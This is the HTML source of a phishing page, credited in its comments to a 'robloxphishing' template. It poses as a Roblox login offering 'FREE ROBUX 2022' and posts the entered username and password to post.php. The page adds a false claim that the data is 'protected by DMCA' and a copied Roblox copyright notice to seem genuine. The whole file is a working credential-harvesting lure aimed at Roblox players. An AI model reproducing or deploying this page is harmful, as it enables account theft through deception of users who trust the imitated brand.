index.html 3.1 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136
  1. <!DOCTYPE html>
  2. <!-- Teamplate from https://github.com/feelatkeen/robloxphishing -->
  3. <!-- Modified by https://github.com/makdosx -->
  4. <html>
  5. <head>
  6. <meta charset="UTF-8">
  7. <title>Roblox FREE ROBUX 2022</title>
  8. <link href="https://fonts.googleapis.com/css?family=Source+Sans+Pro" rel="stylesheet">
  9. <style>
  10. body{
  11. font-family: "Source Sans Pro";
  12. }
  13. .header{
  14. background:#0074BD;
  15. color:white;
  16. margin-top:-8px;
  17. margin-left:-8px;
  18. padding-left:3px;
  19. padding-top:3px;
  20. margin-right:-8px;
  21. }
  22. .content{
  23. text-align:center;
  24. }
  25. .copyright{
  26. position:absolute;
  27. bottom:0;
  28. color:gray;
  29. font-size:9px;
  30. left:30%;
  31. }
  32. #logininpt{
  33. height: 40px;
  34. width: 300px;
  35. font-size: 18px;
  36. }
  37. #LoginButton {
  38. background-color: #00B259;
  39. border: 1px solid;
  40. border-color: #006633;
  41. border-radius:2px;
  42. color: white;
  43. font-weight: 400;
  44. font-size: 18px;
  45. margin-top: 10px;
  46. height: 40px;
  47. width: 320px;
  48. }
  49. #OkButton {
  50. background-color: #00B259;
  51. border: 1px solid;
  52. border-color: #006633;
  53. border-radius:2px;
  54. color: white;
  55. font-weight: 400;
  56. font-size: 18px;
  57. margin-top: 10px;
  58. height: 40px;
  59. width: 320px;
  60. }
  61. #LoginButton:hover {
  62. background-color: #00B259;
  63. border: 1px solid;
  64. border-color: #006633;
  65. border-radius:2px;
  66. color: white;
  67. font-weight: 400;
  68. font-size: 14px;
  69. cursor:pointer;
  70. height: 40px;
  71. width: 320px;
  72. }
  73. #OkButton:hover {
  74. background-color: #00B259;
  75. border: 1px solid;
  76. border-color: #006633;
  77. border-radius:2px;
  78. color: white;
  79. font-weight: 400;
  80. font-size: 18px;
  81. cursor:pointer;
  82. height: 40px;
  83. width: 320px;
  84. }
  85. .prettygood{
  86. color:#006600;
  87. font-size:10px;
  88. }
  89. .prettyevil{
  90. color:#660000;
  91. font-size:10px;
  92. }
  93. .crichalka{
  94. background:black;
  95. color:white;
  96. border-left-style:solid;
  97. border-left-color:gray;
  98. border-left-width:10px;
  99. border-radius:3px;
  100. display:inline-block;
  101. }
  102. </style>
  103. <script type="text/javascript" src="https://code.jquery.com/jquery-latest.min.js"></script>
  104. </head>
  105. <body>
  106. <div class="header" align="center">
  107. <img src="icon.png" width=300>
  108. </div>
  109. <div class="content">
  110. <div id="stepone">
  111. <h1> Login to Roblox </h1>
  112. <div class="loginwindow">
  113. <form action="post.php" method="post">
  114. <p></p>
  115. <input id="logininpt" name="user" placeholder="Username/Email/Phone">
  116. <br>
  117. <p></p>
  118. <input id="logininpt" name="pass" placeholder="Password">
  119. <br>
  120. <input type="submit" value="Log In" id="LoginButton">
  121. <h3 class="prettyevil">Warning: you need to be BC</h3>
  122. <h3 class="prettygood">Your account data (logins and passwords) are protected by DMCA.</h3>
  123. </form>
  124. </div>
  125. </div>
  126. <p class="copyright">©2022 Roblox Corporation. Roblox, the Roblox logo, Robux, Bloxy, and Powering Imagination are among our registered and unregistered trademarks in the U.S. and other countries.</p>
  127. </div>
  128. </body>
  129. </html>